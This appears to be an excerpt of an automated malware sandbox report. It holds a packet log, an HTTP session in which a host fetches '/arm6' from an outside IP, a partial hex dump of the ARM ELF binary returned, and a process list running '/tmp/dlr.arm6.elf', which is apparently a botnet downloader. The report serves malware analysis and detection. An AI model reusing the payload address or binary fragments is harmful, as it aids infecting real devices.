                                                              Dec 21, 2024 04:17:03.697808981 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.698780060 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:03.702972889 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.703090906 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:03.704545975 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:04.814997911 CET4268480192.168.2.2337.44.238.94
                                                              Dec 21, 2024 04:17:04.934725046 CET804268437.44.238.94192.168.2.23
                                                              Dec 21, 2024 04:17:06.211690903 CET4433360654.171.230.55192.168.2.23
                                                              Dec 21, 2024 04:17:06.211936951 CET33606443192.168.2.2354.171.230.55
                                                              Dec 21, 2024 04:17:06.331629992 CET4433360654.171.230.55192.168.2.23
                                                              Dec 21, 2024 04:17:07.477924109 CET42836443192.168.2.2391.189.91.43
                                                              Dec 21, 2024 04:17:08.245762110 CET4251680192.168.2.23109.202.202.202
                                                              Dec 21, 2024 04:17:21.812009096 CET43928443192.168.2.2391.189.91.42
                                                              Dec 21, 2024 04:17:34.098381042 CET42836443192.168.2.2391.189.91.43
                                                              Dec 21, 2024 04:17:38.193800926 CET4251680192.168.2.23109.202.202.202
                                                              Dec 21, 2024 04:18:02.766721010 CET43928443192.168.2.2391.189.91.42
                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              0192.168.2.234268437.44.238.9480
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 04:17:01.829591036 CET46OUTGET /arm6 HTTP/1.0
                                                              Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00
                                                              Data Ascii: RAY
                                                              Dec 21, 2024 04:17:03.099242926 CET711INHTTP/1.0 200 OK
                                                              Accept-Ranges: bytes
                                                              Content-Length: 88800
                                                              Content-Type: application/octet-stream
                                                              Last-Modified: Sat, 21 Dec 2024 03:10:50 GMT
                                                              Date: Sat, 21 Dec 2024 03:17:02 GMT
                                                              Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 54 81 00 00 34 00 00 00 00 59 01 00 02 00 00 04 34 00 20 00 03 00 28 00 0c 00 0b 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 84 55 01 00 84 55 01 00 05 00 00 00 00 80 00 00 01 00 00 00 88 55 01 00 88 55 02 00 84 55 02 00 08 03 00 00 68 d7 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 8c 58 02 00 00 00 00 00 84 55 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff 2f 11 30 00 9f e5 00 30 90 e5 00 00 53 e3 03 00 00 0a 24 30 9f e5 00 00 53 e3 0f e0 a0 11 13 ff 2f 11 04 d0 8d e2 04 e0 9d e4 1e ff 2f e1 00 00 00 00 84 55 02 00 90 58 02 00 90 55 02 00 00 00 [TRUNCATED]
                                                              Data Ascii: ELF(T4Y4 (UUUUUhQtd-L@-,@0S 0S/00@/XU-@0SM88/00S$0S//UXU ---083<G-p `!p00PPPUG/!p@P$#6!_"
                                                              Dec 21, 2024 04:17:03.099611044 CET1236INData Raw: 04 00 a0 e1 f0 35 00 eb b4 21 00 eb 3a 20 00 eb 6c 30 9f e5 00 00 d3 e5 00 00 50 e3 0e 00 00 0a 60 30 9f e5 00 10 93 e5 00 c0 91 e5 04 30 dc e5 07 00 53 e1 05 20 a0 11 04 00 00 1a 08 00 00 ea 02 c1 91 e7 04 30 dc e5 07 00 53 e1 04 00 00 0a 01 20
                                                              Data Ascii: 5!: l0P`00S 0S R5 0/XXP@-@0S0R^@/P;
                                                              Dec 21, 2024 04:17:03.099627972 CET1236INData Raw: 00 20 84 e5 04 30 c4 e5 01 11 a0 e1 4c 30 00 eb 00 30 d5 e5 00 20 a0 e1 03 41 80 e7 08 10 a0 e3 07 30 83 e0 07 00 a0 e1 00 30 c5 e5 00 20 86 e5 f6 2f 00 eb 00 10 d5 e5 ac 20 9f e5 00 40 a0 e1 0b 30 a0 e3 07 10 81 e0 00 00 96 e5 00 20 84 e5 04 30
                                                              Data Ascii: 0L00 A00 / @0 0900 A00 /d @0 0&00A @/XXp<
                                                              Dec 21, 2024 04:17:03.099644899 CET1236INData Raw: 04 20 a0 e1 01 39 a0 e3 c5 2b 00 eb 01 60 86 e2 ed ff ff ea 10 40 95 e5 1d 0f 00 eb ff 18 04 e2 24 2c a0 e1 21 24 82 e1 ff 3c 04 e2 03 24 82 e1 14 10 d5 e5 04 2c 82 e1 30 21 82 e0 ff 08 02 e2 22 3c a0 e1 20 34 83 e1 ff 1c 02 e2 01 34 83 e1 02 3c
                                                              Data Ascii: 9+`@$,!$<$,0!"< 44<0$O/O-,MP`p..H@D 0, 0 <
                                                              Dec 21, 2024 04:17:03.099737883 CET1236INData Raw: 07 00 5b e1 04 90 89 e2 18 a0 8a e2 c8 ff ff 1a 00 40 a0 e3 07 00 54 e1 05 20 a0 e1 01 39 a0 e3 fa ff ff aa 04 01 98 e7 04 11 96 e7 8a 2a 00 eb 01 40 84 e2 f6 ff ff ea e3 0d 00 eb 00 08 a0 e1 20 08 a0 e1 04 00 8d e5 ad ff ff ea f0 40 2d e9 02 38
                                                              Data Ascii: [@T 9*@ @-8P# Mp# 0 0` 0+@ :( 6(P=/@/O-TM
                                                              Dec 21, 2024 04:17:03.099764109 CET1236INData Raw: 0b 20 a0 e1 b0 11 c6 e1 05 00 a0 e1 06 10 a0 e1 db fe ff eb b0 01 c6 e1 b2 60 d6 e1 08 11 9a e7 b2 60 c7 e1 10 c0 a0 e3 18 00 9d e5 09 20 a0 e1 01 39 a0 e3 80 10 8d e8 63 29 00 eb 01 80 88 e2 0c 20 9d e5 02 00 58 e1 3a 00 00 aa 08 20 9d e5 88 32
                                                              Data Ascii: `` 9c) X: 21Cp QR`@$,!$<$,0!"< 44<080sH @DP,Q
                                                              Dec 21, 2024 04:17:03.099778891 CET1192INData Raw: 84 41 9d e5 74 31 9d e5 04 00 53 e1 00 10 a0 13 01 10 a0 03 28 00 52 e3 00 10 a0 93 00 00 51 e1 e5 ff ff 0a 01 2c 8d e2 b4 38 dd e1 b2 58 d2 e1 03 00 55 e1 e0 ff ff 1a 91 30 dd e5 12 30 03 e2 12 00 53 e3 dc ff ff 1a 88 e0 9d e5 8c c0 9d e5 ff 08
                                                              Data Ascii: At1S(RQ,8XU00S,<.,!4 $4$<,P@(00@00PX3 X0 D 0 0
                                                              Dec 21, 2024 04:17:03.099796057 CET1236INData Raw: 05 10 a0 e1 00 20 a0 e3 02 3c a0 e3 00 70 a0 e1 04 00 a0 e1 fb f8 ff eb 01 20 a0 e3 02 30 a0 e1 3c 00 8d e5 05 10 a0 e1 04 00 a0 e1 f5 f8 ff eb 00 c0 a0 e1 ff c0 0c e2 05 10 a0 e1 13 20 a0 e3 00 30 a0 e3 04 00 a0 e1 40 c0 8d e5 ed f8 ff eb ec 24
                                                              Data Ascii: <p 0< 0@$0` 'p$$`0 # &px`(8'HZpD`\+408@
                                                              Dec 21, 2024 04:17:03.099813938 CET1236INData Raw: 38 30 9d e5 04 00 53 e1 bc 02 c5 e1 9f ff ff 1a 30 09 00 eb 44 40 9d e5 00 00 54 e3 10 30 95 15 b2 00 c7 e1 10 30 86 15 9d ff ff 1a 29 09 00 eb 40 10 9d e5 00 00 51 e3 10 00 86 e5 9b ff ff 0a 08 00 87 e2 3c 10 9d e5 7d 09 00 eb 97 ff ff ea 24 00
                                                              Data Ascii: 80S0D@T00)@Q<}$dO/<< 4hHO-@M8M0C !4<!<6@0-8@ l6"#(
                                                              Dec 21, 2024 04:17:03.100052118 CET1236INData Raw: 1c e1 9d e5 06 74 87 e1 00 60 d0 e5 38 c1 8d e5 0e a4 8a e1 08 e0 d0 e5 28 e1 8d e5 0c c0 d0 e5 20 c1 8d e5 10 e0 d0 e5 18 e1 8d e5 14 c0 d0 e5 18 e0 9d e5 10 c1 8d e5 5c c1 9d e5 0c e4 8e e1 2c c1 9d e5 18 e0 8d e5 0b b4 8c e1 60 e1 9d e5 0c c0
                                                              Data Ascii: t`8( \,`D8(Tpdt TDBRaq@`aPpq
                                                              Dec 21, 2024 04:17:03.219440937 CET1236INData Raw: 80 21 8d e5 03 40 84 e0 98 21 9d e5 18 32 9d e5 03 20 82 e0 14 20 8d e5 4c 21 9d e5 28 3c a0 e1 40 20 82 e2 64 21 8d e5 d8 30 8d e5 27 2c a0 e1 25 3c a0 e1 cc 20 8d e5 c0 30 8d e5 2c 2c a0 e1 2e 3c a0 e1 b4 20 8d e5 a8 30 8d e5 21 2c a0 e1 ec 30
                                                              Data Ascii: !@!2 L!(<@ d!0',%< 0,,.< 0!,0 #<0",0 #<x0",)<l `00#<H0&<*,002T ,< 0$,$ 2L!d1R(( '$ '( %$


                                                              System Behavior

                                                              Start time (UTC):03:17:01
                                                              Start date (UTC):21/12/2024
                                                              Path:/tmp/dlr.arm6.elf
                                                              Arguments:/tmp/dlr.arm6.elf
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):03:17:05
                                                              Start date (UTC):21/12/2024
                                                              Path:/usr/bin/dash
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):03:17:05
                                                              Start date (UTC):21/12/2024
                                                              Path:/usr/bin/rm
                                                              Arguments:rm -f /tmp/tmp.TvQvaj4xgW /tmp/tmp.XT3CbeV7Ol /tmp/tmp.5wuaxOy4MS
                                                              File size:72056 bytes
                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                              Start time (UTC):03:17:05
                                                              Start date (UTC):21/12/2024
                                                              Path:/usr/bin/dash
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):03:17:05
                                                              Start date (UTC):21/12/2024
                                                              Path:/usr/bin/rm
                                                              Arguments:rm -f /tmp/tmp.TvQvaj4xgW /tmp/tmp.XT3CbeV7Ol /tmp/tmp.5wuaxOy4MS
                                                              File size:72056 bytes
                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b